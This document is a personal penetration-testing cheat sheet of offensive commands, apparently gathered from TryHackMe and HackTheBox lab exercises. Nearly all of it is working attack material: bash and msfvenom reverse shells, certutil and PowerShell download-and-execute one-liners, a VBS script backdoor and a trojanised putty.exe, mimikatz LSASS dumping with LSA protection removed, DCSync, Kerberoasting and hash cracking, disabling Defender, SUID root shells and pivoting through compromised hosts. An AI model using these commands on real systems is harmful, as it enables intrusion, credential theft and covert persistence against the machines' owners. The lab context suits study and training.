Usefull_Commands.txt

./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' ->execute setuid Linux
 
##########
Reverse Shell simple Bash Script:
#!/bin/bash
bash -i >& /dev/tcp/10.10.62.51/4545 0>&1

Reverse Shell Generator:
    ->https://www.revshells.com/
########## 
 
As we can set SUID bits, a simple executable that will run /bin/bash on the target system will do the job:


####################
Linux remote shell
####################
└─$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f elf > shell.elf


####################
Window remote shell
####################
Kali:
    msfvenom -p windows/shell_reverse_tcp LHOST=<KALI IP> LPORT=443 -f exe > remote.exe

    nc -lvnp 443
    python3 -m http.server 80

Windows:
    certutil -urlcache -f http://<KALI IP>/remote.exe remote.exe
    certutil -urlcache -f http://10.6.1.162/remote.exe remote.exe

    

####################
Linux upload scripts
####################
If possible in "tmp" file:
wget http://<KaliIP>/scriptName scriptName

####################
####################

SUID Escalation Linux
scrypt: c.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    int main(void){
            setuid(0);
            setgid(0);
            system("/bin/bash -p");
            return 0;
    }

cmd:
    gcc c.c -o code
    chmod +x c.c

####################
####################

Remotely Creating Services Using sc:

    Metasploit Reverse shell:
        ->msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=ATTACKER_IP LPORT=4444 -o myservice.exe

    We will then proceed to use t1_leonard.summers credentials to upload our payload to the ADMIN$ share of THMIIS using smbclient from our AttackBox:
        ->smbclient -c 'put myservice.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever

    Once our executable is uploaded, we will set up a listener on the attacker's machine to receive the reverse shell from msfconsole:
        ->msfconsole
        ->msf6 > use exploit/multi/handler
        ->msf6 exploit(multi/handler) > set LHOST AttakerIP
        ->msf6 exploit(multi/handler) > set LPORT 4444
        ->msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
        ->msf6 exploit(multi/handler) > exploit 


        ->nc -lvp 4443

    Since sc.exe doesn't allow us to specify credentials as part of the command, we need to use runas to spawn a new shell with t1_leonard.summer's access token.
    Windows Machine>runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443"

    And finally, proceed to create a new service remotely by using sc, associating it with our uploaded binary:
        ->C:\> sc.exe \\thmiis.za.tryhackme.com create THMservice-3249 binPath= "%windir%\myservice.exe" start= auto
        ->C:\> sc.exe \\thmiis.za.tryhackme.com start THMservice-3249

    After checl the listener on "msfconsole"

####################
####################

Lateral Movement using MSI payload:
    Creating our MSI payload
        ->msfvenom -p windows/x64/shell_reverse_tcp LHOST=lateralmovement LPORT=4445 -f msi > myinstallerPyaloadName.msi

    We then copy the payload using SMB or any other method available:
        ->smbclient -c 'put myinstallerPyaloadName.msi' -U userName -W ZA '//thmiis.za.tryhackme.com/admin$/' Password

    Since we copied our payload to the ADMIN$ share, it will be available at C:\Windows\ on the server.

    We start a handler to receive the reverse shell from Metasploit:
        ->msfconsole
        ->msf6 > use exploit/multi/handler
        ->msf6 exploit(multi/handler) > set LHOST AttakerIP
        ->msf6 exploit(multi/handler) > set LPORT 4445
        ->msf6 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
        ->msf6 exploit(multi/handler) > exploit 

    Let's start a WMI session against THMIIS from a Powershell console:
        PS C:\> $username = 'userNam';
        PS C:\> $password = 'Password';
        PS C:\> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
        PS C:\> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
        PS C:\> $Opt = New-CimSessionOption -Protocol DCOM
        PS C:\> $Session = New-Cimsession -ComputerName <ComputerName> -Credential $credential -SessionOption $Opt -ErrorAction Stop


        We then invoke the Install method from the Win32_Product class to trigger the payload:
        Powershell
        PS C:\> Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstallerPyaloadName.msi"; Options = ""; AllUsers = $false}

####################
####################

Backdoring:
Backdooring .vbs Scripts
As an example, if the shared resource is a VBS script, we can put a copy of nc64.exe on the same share and inject the following code in the shared script:
    ->CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\10.10.28.6\myshare\nc64.exe %tmp% & %tmp%\nc64.exe -e cmd.exe <attacker_ip> 1234", 0, True

This will copy nc64.exe from the share to the user's workstation %tmp% directory and send a reverse shell back to the attacker whenever a user opens the shared VBS script.


Backdooring .exe Files
If the shared file is a Windows binary, say putty.exe, you can download it from the share and use msfvenom to inject a backdoor into it. 
The binary will still work as usual but execute an additional payload silently. 

To create a backdoored putty.exe, we can use the following command:
    ->msfvenom -a x64 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=4444 -b "\x00" -f exe -o puttyX.exe

The resulting puttyX.exe will execute a reverse_tcp meterpreter payload without the user noticing it. 
Once the file has been generated, we can replace the executable on the windows share and wait for any connections using the exploit/multi/handler module from Metasploit.

####################
####################

In Windows VIctim Download File:
        certutil -urlcache -f http://x.x.x.x:8080/FileName  FileName<- We can change the neame of the exe that will be downloaded locally
            or
        certutil.exe -urlcache -f http://x.x.x.x:8080/FileName  FileName

Simple SCP from Windows Victim Machine to ATTAK Machine Kali:
    scp FileNAme <Username>@<KALI IP>:/FilePAth/ .

If certutil doesn<t work try with Powershell scitp:
    powershell -ep bypass
    IEX(New-Object Net.WebClient).DownloadString("http://<Kali IP: Port>/PowerUp.ps1")


####################
MIMIKATZ - LSASS DUMP MEMORY (Check: Check: AD -> Credentials Harversting -> Local Security Authority Subsystem Service LSASS.txt)
####################

Runing mimikatz With Admin Privielges
    C:\Tools\Mimikatz> mimikatz.exe

Before dumping the memory for cashed credentials and hashes, we need to enable the SeDebugPrivilege and check the current permissions for memory access. 
It can be done by executing:
    privilege::debug command as follows:

    mimikatz # privilege::debug
        Privilege '20' OK

Failing to Dump Stored Password Due to the LSA Protection
        mimikatz # sekurlsa::logonpasswords
            ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

The command returns a 0x00000005 error code message (Access Denied). 
Lucky for us, Mimikatz provides a mimidrv.sys driver that works on kernel level to disable the LSA protection. We can import it to Mimikatz by executing "!+" as follows,

Loading the mimidrv Driver into Memory
    mimikatz # !+

Removing the LSA Protection:
    mimikatz # !processprotect /process:lsass.exe /remove



####################
Mimikatz:Dumping Memory for Credentials Manager (Check: AD -> Credentials Harversting -> Windows Credential Manager.txt)
####################

C:\Users\Administrator>c:\Tools\Mimikatz\mimikatz.exe
    mimikatz # privilege::debug
    Privilege '20' OK

    mimikatz # sekurlsa::credman


####################
DC Sync:Impacket DE-HASH (Check: AD -> Credentials Harversting -> Dumping Domain Controller.txt)
####################

The DC Sync Attack to Dump NTLM Hashes in KALI:
        user@machine$ python3.9 /opt/impacket/examples/secretsdump.py -just-dc-ntlm THM.red/<AD_Admin_User>@MACHINE_IP
        
        Once we obtained hashes, we can either use the hash for a specific user to impersonate him or crack the hash using Cracking tools, such hashcat. 
            
            
        We can use the hashcat -m 1000 mode to crack the Windows NTLM hashes as follows:
        Cracking the Hashes in KALI:
            user@machine$ hashcat -m 1000 -a 0 /path/to/ntlm_hashes.txt /path/to/wordlist/such/as/rockyou.txt

####################
RUNAS 
####################

If we have the AD credentials in the format of :, we can use Runas, a legitimate Windows binary, to inject the credentials into memory:
        -ex: runas.exe /netonly /user:<domain>\<username> cmd.exe
            Let's look at the parameters:

            /netonly - Since we are not domain-joined, we want to load the credentials for network authentication but not authenticate against a domain controller. 
                So commands executed locally on the computer will run in the context of your standard Windows account, but any network connections will occur using the account specified here.

            /user - Here, we provide the details of the domain and the username. It is always a safe bet to use the Fully Qualified Domain Name (FQDN).

            cmd.exe - This is the program we want to execute once the credentials are injected. This can be changed to anything, but the safest bet is cmd.exe since you can then use that to launch whatever you want, with the credentials injected.
    
####################
AD Enumeration Scan
####################
    Scan Network:
        nmap -Pn --script smb-vuln* -p139,445 10.200.24.101
        nmap -Pn -sV --top-ports 50 --open <ip> -vv
        nmap -n -sV --script"ldap* and not brute" -p 389 10.200.24.101

    List Guess access on SMB:
        smbmap -u "" -p "" -P 445 -H <IP>
        smbmap -H <ip> -u anonymous -R #Recursive search

        smbclient -U '%' -L //10.200.24.101
        smbclient -U 'guest%' -L //10.200.24.101

    FInd DC IP:
        nslookup -type=SRV _ldap._tcp.dc.msdcs.za.tryhackme.com

    
    
    Enumerateldap: ldapsearch -x -h 10.200.24.101 -s base:
        ldapServiceName: za.tryhackme.com:thmdc$@ZA.TRYHACKME.COM
        dnsHostName: THMDC.za.tryhackme.com

    Find User list: net rpc group members 'Domain Users' -W 'ZA.TRYHACKME.COM' -I '10.200.24.101' -U '%'


####################
AD Enumeration Lateral Movement
####################
    evil-winrm -i <ip> -u <svcUser> -p <password>
    evil-winrm -u <> -p <> -i <>



####################
Check DNS for SYSVOL in AD Enumeration
####################
SYSVOL is a folder that exists on all domain controllers. 
It is a shared folder storing the Group Policy Objects (GPOs) and information along with any other domain related scripts. 
It is an "essential component" for Active Directory since it delivers these GPOs to all computers on the domain. 
Domain-joined computers can then read these GPOs and apply the applicable ones, making domain-wide configuration changes from a central location.

Before we can list SYSVOL, we need to configure our DNS. 
Sometimes you are lucky, and internal DNS will be configured for you automatically through DHCP or the VPN connection, but not always. 
It is good to understand how to do it manually. Your safest bet for a DNS server is usually a domain controller. Using the IP of the domain controller, we can execute the following commands in a 

PowerShell window:
    $dnsip = "<Domain Controller IP>" 
    $index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
    Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

in our Victim's Windows cmd prompt:
        nslookup domainFQDN

    We can use the following command to force a network-based listing of the SYSVOL directory:
        dir \\za.tryhackme.com\SYSVOL\


####################
AD Enumeration via CMD Windows VIctim's machine
##################
Users:
    We can use the net command to list all users in the AD domain by using the user sub-option:
        net user /domain

    We can also use this sub-option to enumerate more detailed information about a single user account:
        net user zoe.marshall /domain

Groups:
    We can use the net command to enumerate the groups of the domain by using the group sub-option:
        C:\>net group /domain

    We could also enumerate more details such as membership to a group by specifying the group in the same command:
        net group "Tier 1 Admins" /domain

Password Policy:
    We can use the net command to enumerate the password policy of the domain by using the accounts sub-option:
        C:\>net accounts /domain

####################
AD Enumeration via CMD PowerShell
##################

->refer to Enumeration_trough_Powershell.txt

!!!!DISCLAIMER!!!!
PowerShell is often monitored more by the blue teams than Command Prompt.
We have to install the AD-RSAT tooling or use other, potentially detectable, scripts for PowerShell enumeration.


####################
BloodHound + SharpHound
##################
!!!!!!!!!!!!!!! Drawbacks !!!!!!!!!!!!!!!!!!!!!
Requires the execution of Sharphound, which is noisy and can often be detected by AV or EDR solutions.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

What command can be used to execute Sharphound.exe and request that it recovers Session information 
only from the za.tryhackme.com domain without touching domain controllers?

    SharpHound.exe --CollectionMethods Sessions --Domain za.tryhackme.com --ExcludeDCs


####################
AD Exploit 
##################
AddMember:
    Powershell:
        Add-ADGroupMember "IT Support" -Members "Your.AD.Account.Username"

    verify that the command worked by using the Get-ADGroupMember cmdlet:
       Get-ADGroupMember -Identity "Groupe Name"

If we can:
    ForceChangePassword:
        Get-ADGroupMember -Identity "Tier 2 Admins" : Identify a Victim

    Use the Set-ADAccountPassword AD-RSAT cmdlet to force change the password:
            $Password = ConvertTo-SecureString "New.Password.For.User" -AsPlainText -Force 
            Set-ADAccountPassword -Identity "AD.Account.Username.Of.Target" -Reset -NewPassword $Password 

***
Note: If you get an Access Denied error, your permissions have not yet propagated through the domain. 
This can take up to 10 minutes. The best approach is to terminate your SSH or RDP session, take a quick break, and then reauthenticate and try again. 
You could also run gpupdate /force and then disconnect and reconnect, which in certain cases will cause the synchronisation to happen faster.


Which ACE would allow you to update any non-protected parameter of a target object: GenericWrite

PASS THE HASH:
    Get access to the User account via Hash NTLM by using Evil-winrm:
        evil-winrm -i <TargetIP> -u <NLTMUserName> -H <LAST PART OF THE NTLM HASH>



Upload payload from Victim machine: -> Active_Directory/AD_Step4/Exploiting_AD_Users.txt
    You can host your meterpreter shell using a Python webserver and then copy it using something like this form Victim PC:
    certutil.exe -urlcache -split -f http:///shell.ps1

        Split:
            Certutil.exe may download a file from a remote destination using -urlcache. 
            This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used.

    or in case of python3 web server download from:
        ceruti -urlcache -f http:\\<ATTCK IP MACHINE>:<PORT>/<PayloadName>  <PayloadName>

####################
Powershell Download
##################

to download an exe from powershell on a web server in our Kali machine

    powershell -c 'IEX(New_Object Net.WebClient).DownloadString("http://<KaliIP/exeFile>")'
    powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('')"




####################
Privilege Escalation Windows
##################
    https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

    Windows cmd that list Schedule TaskName + Privileges:
    -> schtask /query /fo /LIST /v /TN "TaskName"


####################
SSH connection from Linux Machine to machine in Active Directory
##################
    ssh <Domain Name>\\<AD Username>@<Domain Name>


####################
Powershell Manual Service enum
####################
powershell -ep bypass
What powershell -c command could we run to manually find out the service name? 
        powershell -c Get-Service

####################
crackmapexec inspection lssas dump
####################
crackmapexec smb 10.10.10.10/24 -u <username> -H <NTLM HASH FULL> --local-auth -M lsassy

find crackmapexec DB:
    cmedb
    >help

##################
evil winrm 
##################
To upload file instead of certutil 

WE CAN USE 'upload'

Manually find passwords:
    findstr /si password *.txt

Find if schedultask programmed:
    schtasks /query/fo LIST/v

Add new user in order to dump the hashes:
    net user adib adib1234 /add /domain

#####################
Base64 decrypt in Kali 
#####################
echo YmFDVDNyMWFOMDBkbGVz | base64 -d

#####################
VNC Hex Passwd Decrypt
#####################
https://github.com/frizb/PasswordDecrypts
            echo -n <Hex Here> | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv


######################
 Hacking SQL Server via Burp Suite - Repeater
######################
https://dencode.com/en/string/unicode-escape
https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
-
https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
to get the SID via SQL func:
    unicode escape - to return in plain text:
        ' UNION ALL SELECT 70,(SELECT master.dbo.vfn_varbintohexstr(SUSER_ID('MEGACORP\Domain Admins'))),70,70,70-- CJcx"

        SID:
            0x0105000000000005150000001c00d1bcd181f1492bdfc23600020000
        
        RID:
            20000


########################
Kerberos ASREP
#######################
We use BloodHound: <--- From Multimaster Boxe
        We find that we have the right to add user spn via the account:
            *Evil-WinRM* PS C:\Users\s***\Desktop> Set-ADUser -Identity jorden -ServicePrincipalNames @{Add='HTTP/webserver', 'HTTP/SomeAlias'}


    Get the added SPNs:
        python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -dc-ip 10.10.10.100 megacorp.local/s****:***! -request:
            ServicePrincipalName  Name    MemberOf                                      PasswordLastSet             LastLogon  Delegation 
            --------------------  ------  --------------------------------------------  --------------------------  ---------  ----------
            HTTP/SomeAlias        jorden  CN=Developers,OU=Groups,DC=MEGACORP,DC=LOCAL  2020-01-09 19:48:17.503303  <never>               
            HTTP/webserver        jorden  CN=Developers,OU=Groups,DC=MEGACORP,DC=LOCAL  2020-01-09 19:48:17.503303  <never>   


    We will set it to PRE-Auth and use GetNPUsers to dump the Hash:
        *Evil-WinRM* PS C:\Users\s***\Desktop> Get-ADUser -Identity jorden | Set-ADAccountControl -doesnotrequirepreauth $true

        python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip 10.10.10.100 megacorp.local/s****:***! -request
Cracking the AS_REP $23

            └─$ hashcat hash.hash /usr/share/wordlists/rockyou.txt -m 18200


####################
Modify user - admin Password
####################

We Modify the Admin Passwd:
    *Evil-WinRM* PS C:\Users\jorden\Documents> net user Administrator adib7575!


We connect as Admin:
    ─$ evil-winrm -i 10.10.10.179 -u administrator  -p adib7575!    
    *Evil-WinRM* PS C:\Users\Administrator\Documents> 


####################
Port Forwarding via sshuttle
####################
sshuttle -r <user>@IP -e "ssh -i <password> or <privateKey>" <IPSubnet/CIDR>


####################
Turning of Real-Time Defender
####################
set cmd powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true -Verbose"


####################
Windows cmd to find a Domain
####################
systeminfo | findstr /B /C:"Domain"


####################
Win Priv ESC with Saved Creds
####################
C:>cmdkey /list

if it show saved creds:

C:>runas /savecred /user:user@domain.domain powershell.exe


#####################
LINUX INTERACTIVE SHELL
#####################
INTERACTIVE SHELL:
        https://fahmifj.medium.com/get-a-fully-interactive-reverse-shell-b7e8d6f5b1c1




#####################
LINUX Monitor.sh Priv Escal Manual
#####################
sudo -l <-- find monitor.sh
            User nibbler may run the following commands on Nibbles:
            (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

            
 We will modify monitor.sh:
        nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh

        we can add a command at the end of the script:
            echo "bash -p" >> monitor.sh
            sudo -u root ./monitor.sh

###########
Linux SUID ls
###########

find / -perm -u=s -type f -ls 2>/dev/null

###########
Linux SSH public key add - LFILE
###########
READTEAM CAPSTONE - VPN MACHINE
sudo -l:
    "it show us that we can check in file via" /bin/cp"
        sudo /bin/cp /home/ubuntu/.ssh/authorized_keys /dev/stdout
    We have the Authorized key
    We also find root password

    In Kali:
        ssh-keygen -t rsa
        we cat in the right file path 'id_rsa.pub'

    We will add OUR RSA key to the Compromise Machine:
        LFILE=/home/ubuntu/.ssh/authorized_keys                        
        echo "ssh-rsa <our public key>" | sudo /bin/cp /dev/stdin "$LFILE"

    In Kali:
        ssh ubuntu@10.200.116.12 -i /home/kali/.ssh/id_rsa

    Ubuntu SHell:
        sudo -su root:
            @root


##########
CHISEL PIVOTING + SCAN cf: REDTEAM CAPSTONE 
https://www.youtube.com/watch?v=pbR_BNSOaMk
##########
Pivoting Chisel: https://github.com/jpillora/chisel/releases

Pivoting with Chisel (Perform a successfull Nmap scan from Kali by passing through the COMPROMISE VPNMACHINE):
In Kali:
    sudo python3 -m http.server
    add the chisel bynari for linux:
        https://github.com/jpillora/chisel/releases

In Compromised Machine:
    root@ip-10-200-116-12:/home/adib# wget http://10.50.113.14:8000/chisel
    root@ip-10-200-116-12:/home/adib# chmod +x chisel
                
In Kali:
    chisel server --socks5 --reverse:
        create a 'fingerprint' value ex: 64..y5/.....cQ4Np=

In Compromised Machine:
    root@ip-10-200-116-12:/home/adib# ./chisel client --fingerprint 64..y5/.....cQ4Np= 10.50.113.14:8080 R:socks

In Kali:
we change the proxychain conf file:
    └─$ sudo gedit /etc/proxychains4.conf
    socks5 	127.0.0.1 1080
─$ proxychains nmap 10.200.116.31 -vv


#########
BloodHound.py 
#########
BloodHound.py izi way:
        https://github.com/dirkjanm/BloodHound.py
        https://github.com/fox-it/bloodhound-import

        git clone https://github.com/fox-it/bloodhound-import.git


        https://github.com/dirkjanm/BloodHound.py
            python3 bloodhound.py -d HTB.local -u 'Amanda' -p 'Ashare1972' -c all -ns 10.10.10.103  <---Easyest Way Bro it's 2024 start to be lazy as possible - Chill Man - Relax Man ahaha


###############
KERBEROSTABLE ACCOUNT KERBEROASTING
###############
If BloodHound or Else find KERBEROSTABLE ACCOUNTS:

REDTEAMCAPSTONE + Active.txt
KERBEROASTABLE ACCOUNTS:
    proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py <corp.thereserve.loc>/<User>:"<Passwd>@" -dc-ip 10.200.116.102  -request

WE GET The Administrator Ticket HASH with the REF (krb5tgs$23):
        hashcat NTLM.hash /usr/share/wordlists/rockyou.txt -m 13100  (13100 - TGS-REP)

 We can use evilWin-rm to access machine:
    proxychains -q evil-winrm -u svcScanning -p <Passwd> -i 10.200.116.31

    *Evil-WinRM* PS C:\Users\svcScanning\Documents>